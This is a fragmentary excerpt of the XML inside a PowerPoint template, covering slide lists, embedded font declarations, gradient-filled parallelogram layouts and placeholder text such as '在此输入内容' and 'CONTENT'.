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3"/>
    <p:sldId id="345" r:id="rId4"/>
    <p:sldId id="346" r:id="rId5"/>
    <p:sldId id="348" r:id="rId6"/>
    <p:sldId id="344" r:id="rId7"/>
    <p:sldId id="347" r:id="rId8"/>
    <p:sldId id="351" r:id="rId9"/>
    <p:sldId id="349" r:id="rId10"/>
    <p:sldId id="350" r:id="rId11"/>
    <p:sldId id="352" r:id="rId12"/>
    <p:sldId id="353" r:id="rId13"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
      <p:regular r:id="rId19"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
      <p:regular r:id="rId20"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
      <p:regular r:id="rId21"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122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9C46C5B-D476-4929-A58C-25CDB5D41020}">
          <p14:sldIdLst>
            <p14:sldId id="325"/>
            <p14:sldId id="345"/>
            <p14:sldId id="346"/>
            <p14:sldId id="348"/>
            <p14:sldId id="344"/>
            <p14:sldId id="347"/>
            <p14:sldId id="351"/>
            <p14:sldId id="349"/>
            <p14:sldId id="350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pos="7355" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="334" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="3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805E"/>
    <a:srgbClr val="799D86"/>
    <a:srgbClr val="49BCDD"/>
    <a:srgbClr val="0ED0A9"/>
    <a:srgbClr val="14CA95"/>
    <a:srgbClr val="19C57A"/>
    <a:srgbClr val="FDF731"/>
    <a:srgbClr val="1F8DA9"/>
    <a:srgbClr val="26ACCE"/>
    <a:srgbClr val="114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115" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="102" d="100"/>
          <a:sy n="102" d="100"/>
        </p:scale>
        <p:origin x="108" y="72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="325"/>
        <p:guide pos="7355"/>
        <p:guide orient="horz" pos="334"/>
        <p:guide orient="horz" pos="39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3003" y="65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OPPOSans L" panose="00020600040101010101" charset="-122"/>
              <a:ea typeface="OPPOSans L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4BB7-ADC9-E64E-AAAA-DB1E10F7C241}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              <a:ea typeface="OPPOSans L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OPPOSans L" panose="00020600040101010101" charset="-122"/>
              <a:ea typeface="OPPOSans L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9CB6-B921-3743-B681-02986F8A8226}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="OPPOSans L" panose="00020600040101010101" charset="-122"/>
              <a:ea typeface="OPPOSans L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fld id="{7BB30C6B-F34A-4F02-BACE-D18C28E3B70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fld id="{175DD2B1-1A58-4FDB-AD54-64407EF7A1E7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L" panose="00020600040101010101" charset="-122"/>
        <a:ea typeface="OPPOSans L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L" panose="00020600040101010101" charset="-122"/>
        <a:ea typeface="OPPOSans L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L" panose="00020600040101010101" charset="-122"/>
        <a:ea typeface="OPPOSans L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L" panose="00020600040101010101" charset="-122"/>
        <a:ea typeface="OPPOSans L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L" panose="00020600040101010101" charset="-122"/>
        <a:ea typeface="OPPOSans L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712787" y="701902"/>
            <a:ext cx="2744515" cy="169342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indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr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8926282" y="6476773"/>
            <a:ext cx="2563589" cy="159319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 marL="0" indent="0">
              <a:buNone/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defTabSz="914400"/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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="平行四边形 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627630" y="2039620"/>
            <a:ext cx="7741285" cy="2804160"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 47826"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="accent3"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="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2500630" y="1897380"/>
            <a:ext cx="7741285" cy="2804160"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 47826"/>
            </a:avLst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14280000" scaled="0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885815" y="1581150"/>
            <a:ext cx="871220" cy="1533525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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2627630" y="3213100"/>
            <a:ext cx="2003425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H="1">
            <a:off x="8074025" y="3656330"/>
            <a:ext cx="2249805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V="1">
            <a:off x="5762625" y="3316605"/>
            <a:ext cx="1067435" cy="1761490"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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H="1">
            <a:off x="8776936" y="3154685"/>
            <a:ext cx="433070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3710940" y="3860165"/>
            <a:ext cx="433070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4299628" y="2302100"/>
            <a:ext cx="4675641" cy="326799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lvl1pPr marL="0" indent="0" algn="dist">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="24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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入标题描述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2960684" y="4179888"/>
            <a:ext cx="5965598" cy="19617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lvl1pPr algn="dist">
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" i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pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Text the description of the title in in English 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</p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="2827499"/>
            <a:ext cx="4969328" cy="10577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lvl1pPr marL="0" indent="0" algn="dist">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="96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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="dist" defTabSz="91440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6" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039586" y="5584145"/>
            <a:ext cx="10112828" cy="16934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lvl1pPr marL="0" indent="0" algn="dist">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" i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pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入中英文修饰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26965" y="2304415"/>
            <a:ext cx="2338705" cy="43053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0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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rPr>
              <a:t>CONTENT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent1">
                      <a:alpha val="20000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent2">
                      <a:alpha val="20000"/>
                    </a:schemeClr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  <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              <a:ea typeface="优设标题黑" panose="00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23205" y="1574800"/>
            <a:ext cx="1546225" cy="92329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zh-CN" altLang="en-US" sz="6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rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6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  <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              <a:ea typeface="优设标题黑" panose="000005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57060" y="2036445"/>
            <a:ext cx="1079500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155440" y="2036445"/>
            <a:ext cx="1080135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平行四边形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="3202305"/>
            <a:ext cx="837565" cy="534035"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 29964"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="accent3">
                  <a:alpha val="2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14280000" scaled="0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altLang="zh-CN" sz="1200" i="1"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1870" y="3223260"/>
            <a:ext cx="581025" cy="492125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400" i="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="0ED0A9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H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="0ED0A9"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent2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  <a:latin typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              <a:ea typeface="OPPOSans H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866900" y="4159885"/>
            <a:ext cx="837565" cy="534035"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 29964"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="accent3">
                  <a:alpha val="2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14280000" scaled="0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altLang="zh-CN" sz="1200" i="1"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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995170" y="4180840"/>
            <a:ext cx="581025" cy="492125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zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:defRPr sz="2400" i="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="0ED0A9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H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0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6946900" y="3202305"/>
            <a:ext cx="837565" cy="534035"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 29964"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="accent3">
                  <a:alpha val="2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14280000" scaled="0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altLang="zh-CN" sz="1200" i="1"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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7075170" y="3223260"/>
            <a:ext cx="581025" cy="492125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zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:defRPr sz="2400" i="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="0ED0A9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H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0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6680200" y="4159885"/>
            <a:ext cx="837565" cy="534035"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 29964"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="accent3">
                  <a:alpha val="2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14280000" scaled="0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altLang="zh-CN" sz="1200" i="1"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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6808470" y="4180840"/>
            <a:ext cx="581025" cy="492125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zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:defRPr sz="2400" i="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="0ED0A9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H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0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3099435" y="3263851"/>
            <a:ext cx="2944057" cy="451534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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="3200" i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H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="dist" defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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2832735" y="4221431"/>
            <a:ext cx="2944057" cy="451534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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="3200" i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H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="dist" defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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</p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7872821" y="3263851"/>
            <a:ext cx="2944057" cy="451534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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="3200" i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H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="dist" defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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46035" y="4206694"/>
            <a:ext cx="2944057" cy="451534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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="3200" i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H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="dist" defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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6" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039586" y="5584145"/>
            <a:ext cx="10112828" cy="16934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lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" i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pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入中英文修饰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712787" y="701902"/>
            <a:ext cx="2783703" cy="169341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indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr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8926282" y="6476773"/>
            <a:ext cx="2563589" cy="159319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 marL="0" indent="0">
              <a:buNone/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defTabSz="914400"/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9586" y="5584145"/>
            <a:ext cx="10112828" cy="16934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lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" i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pPr marL="0" lvl="0" indent="0" algn="dist" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入中英文修饰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599805" y="3408045"/>
            <a:ext cx="1079500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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3398520" y="2874010"/>
            <a:ext cx="1814830" cy="1157605"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 29964"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:alpha val="20000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="accent3">
                  <a:alpha val="2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14280000" scaled="0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altLang="zh-CN" sz="1200" i="1"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3684905" y="2665730"/>
            <a:ext cx="2249805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3311525" y="4258310"/>
            <a:ext cx="4192905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86506" y="2932476"/>
            <a:ext cx="1287369" cy="111785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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="54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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>序号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8" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5258147" y="2891156"/>
            <a:ext cx="3136660" cy="783044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lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="6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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="91440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5200618" y="3693291"/>
            <a:ext cx="2798461" cy="37777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lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="dist" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入英文标题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712788" y="701902"/>
            <a:ext cx="2727098" cy="177664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indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr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8926282" y="6476773"/>
            <a:ext cx="2563589" cy="159319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 marL="0" indent="0">
              <a:buNone/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defTabSz="914400"/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712788" y="548221"/>
            <a:ext cx="2937128" cy="454546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16768" t="-76235" r="-141930" b="-937885"/>
            </a:stretch>
          </a:blipFill>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US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101600" dist="12700" sx="101000" sy="101000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="49BCDD">
                      <a:alpha val="1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入正文标题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8926282" y="6476773"/>
            <a:ext cx="2563589" cy="159319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 marL="0" indent="0">
              <a:buNone/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defTabSz="914400"/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712788" y="701902"/>
            <a:ext cx="2727098" cy="177664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indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr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8926282" y="6476773"/>
            <a:ext cx="2563589" cy="159319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 marL="0" indent="0">
              <a:buNone/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defTabSz="914400"/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-左图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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936625" y="1604963"/>
            <a:ext cx="4419600" cy="44910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3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7534275" y="1812154"/>
            <a:ext cx="2351541" cy="430530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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="zh-CN" alt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H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此输入标题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4" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6643968" y="2456217"/>
            <a:ext cx="4289643" cy="1837094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138515" t="-139856" r="-22142" b="-150137"/>
            </a:stretch>
          </a:blipFill>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="0B184D">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="49BCDD"/>
                </a:soli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在此输入内容在此输入内容在此输入内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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在此输入内容在此输入内容在此输入内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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在此输入内容在此输入内容在此输入内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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在此输入内容在此输入内容在此输入内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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在此输入内容在此输入内容在此输入内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" defTabSz="914400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7" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6517956" y="4954538"/>
            <a:ext cx="1173979" cy="430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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/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6517955" y="5330012"/>
            <a:ext cx="1173979" cy="337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zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入内容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9" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10113396" y="4953363"/>
            <a:ext cx="1173979" cy="430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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/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20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10113395" y="5328837"/>
            <a:ext cx="1173979" cy="337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zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入内容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0" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="701902"/>
            <a:ext cx="2727098" cy="177664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indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr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8926282" y="6476773"/>
            <a:ext cx="2563589" cy="159319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 marL="0" indent="0">
              <a:buNone/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defTabSz="914400"/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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="文本占位符 42"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352427" y="4953363"/>
            <a:ext cx="1173979" cy="430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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/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22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352426" y="5328837"/>
            <a:ext cx="1173979" cy="337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zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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pPr marL="0" lvl="0" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入内容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8538845" y="3042285"/>
            <a:ext cx="1079500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3601085" y="2147570"/>
            <a:ext cx="2249805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917065" y="4593590"/>
